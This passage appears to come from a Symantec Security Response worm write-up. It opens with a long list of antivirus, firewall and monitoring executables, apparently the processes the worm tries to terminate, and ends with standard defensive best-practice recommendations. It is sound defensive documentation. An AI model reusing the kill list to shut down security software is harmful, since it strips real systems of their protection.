      F-AGNT95.EXE
      EXPLORE.EXE
      EXPERT.EXE
      EXE.AVXW.EXE
      EXANTIVIRUS-CNET.EXE
      EVPN.EXE
      ETRUSTCIPE.EXE
      ETHEREAL.EXE
      ESPWATCH.EXE
      ESCANV95.EXE
      ICSUPP95.EXE
      ESCANHNT.EXE
      ESCANH95.EXE
      ESAFE.EXE
      ENT.EXE
      EMSW.EXE
      EFPEADM.EXE
      ECENGINE.EXE
      DVP95_0.EXE
      DVP95.EXE
      DSSAGENT.EXE
      DRWEBUPW.EXE
      DRWEB32.EXE
      DRWATSON.EXE
      DPPS2.EXE
      DPFSETUP.EXE
      DPF.EXE
      DOORS.EXE
      DLLREG.EXE
      DLLCACHE.EXE
      DIVX.EXE
      DEPUTY.EXE
      DEFWATCH.EXE
      DEFSCANGUI.EXE
      DEFALERT.EXE
      DCOMX.EXE
      DATEMANAGER.EXE
      Claw95.EXE
      CWNTDWMO.EXE
      CWNB181.EXE
      CV.EXE
      CTRL.EXE
      CPFNT206.EXE
      CPF9X206.EXE
      CPD.EXE
      CONNECTIONMONITOR.EXE
      CMON016.EXE
      CMGRDIAN.EXE
      CMESYS.EXE
      CMD32.EXE
      CLICK.EXE
      CLEANPC.EXE
      CLEANER3.EXE
      CLEANER.EXE
      CLEAN.EXE
      CFINET32.EXE
      CFINET.EXE
      CFIADMIN.EXE
      CFGWIZ.EXE
      CFD.EXE
      CDP.EXE
      CCPXYSVC.EXE
      CCEVTMGR.EXE
      CCAPP.EXE
      BVT.EXE
      BUNDLE.EXE
      BS120.EXE
      BRASIL.EXE
      BPC.EXE
      BORG2.EXE
      BOOTWARN.EXE
      BOOTCONF.EXE
      BLSS.EXE
      BLACKICE.EXE
      BLACKD.EXE
      BISP.EXE
      BIPCPEVALSETUP.EXE
      BIPCP.EXE
      BIDSERVER.EXE
      BIDEF.EXE
      BELT.EXE
      BEAGLE.EXE
      BD_PROFESSIONAL.EXE
      BARGAINS.EXE
      BACKWEB.EXE
      CLAW95CF.EXE
      CFIAUDIT.EXE
      AVXMONITORNT.EXE
      AVXMONITOR9X.EXE
      AVWUPSRV.EXE
      AVWUPD.EXE
      AVWINNT.EXE
      AVWIN95.EXE
      AVSYNMGR.EXE
      AVSCHED32.EXE
      AVPTC32.EXE
      AVPM.EXE
      AVPDOS32.EXE
      AVPCC.EXE
      AVP32.EXE
      AVP.EXE
      AVNT.EXE
      AVLTMAIN.EXE
      AVKWCTl9.EXE
      AVKSERVICE.EXE
      AVKSERV.EXE
      AVKPOP.EXE
      AVGW.EXE
      AVGUARD.EXE
      AVGSERV9.EXE
      AVGSERV.EXE
      AVGNT.EXE
      AVGCTRL.EXE
      AVGCC32.EXE
      AVE32.EXE
      AVCONSOL.EXE
      AU.EXE
      ATWATCH.EXE
      ATRO55EN.EXE
      ATGUARD.EXE
      ATCON.EXE
      ARR.EXE
      APVXDWIN.EXE
      APLICA32.EXE
      APIMONITOR.EXE
      ANTS.EXE
      ANTIVIRUS.EXE
      ANTI-TROJAN.EXE
      AMON9X.EXE
      ALOGSERV.EXE
      ALEVIR.EXE
      ALERTSVC.EXE
      AGENTW.EXE
      AGENTSVR.EXE
      ADVXDWIN.EXE
      ADAWARE.EXE
      AVXQUAR.EXE
      ACKWIN32.EXE
      AVWUPD32.EXE
      AVPUPD.EXE
      AUTOUPDATE.EXE
      AUTOTRACE.EXE
      AUTODOWN.EXE
      AUPDATE.EXE
      ATUPDATER.EXE
      TASKMON.EXE


    Recommendations

    Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

    • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
    • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers, and they defeat dictionary-based guessing such as the short, predictable list this worm tries against administrative shares. This helps to prevent or limit damage when a computer is compromised.
    • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
    • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
    • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
    • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have fewer avenues of attack.
    • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
    • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
    • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
    • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
    • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
    • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
    • For further information on the terms used in this document, please refer to the Security Response glossary.

    Writeup By: Ying Lin